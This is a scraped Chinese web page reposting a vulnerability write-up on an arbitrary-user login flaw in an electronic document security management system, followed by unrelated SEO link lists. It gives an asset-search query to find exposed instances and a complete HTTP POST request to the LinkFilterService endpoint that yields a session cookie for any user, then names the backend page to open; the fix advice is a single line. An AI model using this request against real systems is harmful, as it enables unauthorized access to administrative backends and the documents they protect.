当前位置: 首页 > news >正文

开发大型网站的流程图重庆百度推广的代理商

开发大型网站的流程图,重庆百度推广的代理商,天津做网站制作,亿速云漏洞简介 某电子文档安全管理系统存在任意用户登录漏洞,攻击者可以通过用户名获取对应的cookie,登录后台。 资产测绘 Hunter语法:web.icon“9fd216c3e694850445607451fe3b3568” 漏洞复现 获取Cookie POST /CDGServer3/LinkFilterServi…

漏洞简介

某电子文档安全管理系统存在任意用户登录漏洞,攻击者可以通过用户名获取对应的cookie,登录后台。

资产测绘

Hunter语法:web.icon==“9fd216c3e694850445607451fe3b3568”

漏洞复现

  1. 获取Cookie
POST /CDGServer3/LinkFilterService HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/120.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,applicati
on/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72userId=GCGHGAGGFAFHFGFCFEFPFD&cur=OHBLODPEJJNLEEGIMPOKHMCPJCHJIDHHCJCACB

在这里插入图片描述
带上Cookie访问URL + /CDGServer3/frame.jsp,即可登录后台
在这里插入图片描述

修复建议

对相关接口进行限制访问、鉴权。

http://www.khdw.cn/news/20394.html

相关文章:

  • 做图片的网站都有哪些广点通推广登录入口
  • 网站建设需求问卷企业推广网站有哪些
  • 网站建设涉及的标准网站seo属于什么专业
  • 青海省网站建设平台关键词排名零芯互联关键词
  • 神马网站可以做兼职冯耀宗seo课程
  • 做微商推广有哪些好的分类信息网站百度反馈中心
  • 网站的设计流程有哪些步骤百度录入网站
  • 网站返利二维码怎么做百度文库个人登录
  • wpsppt网站链接怎么做培训心得总结怎么写
  • 网站全景图怎么做熊猫关键词工具
  • 做一个学校网站上海百度
  • 最牛的网站建百度论坛
  • 网站建设工作函百度搜索数据统计
  • 做服务网站发展背景seo软文是什么
  • 石材做网站成都seo优化
  • 做网站的团队业绩怎么写南宁seo怎么做优化团队
  • 企业手机网站建设方案北京百度seo工作室
  • scala做网站seo就业哪家好
  • 主域名进入网站合肥网络关键词排名
  • 网站原型图设计北京网站seo哪家公司好
  • 企业建设网站作用昆明网站seo公司
  • 简速做网站工作室简单的html网页制作
  • 如何在手机做网站百度指数平台
  • 做网站运营有前景吗排名优化网站
  • 临朐网站制作哪家好以图搜图百度识图网页版
  • 设计本和游戏本的区别一个网站的seo优化有哪些
  • 查找全国免费网站建设合肥网络seo
  • 新手自己建网站网络营销的5种方式
  • 北京短视频制作公司seo视频
  • 周口网站建设 网站制作 网络推广竞价排名推广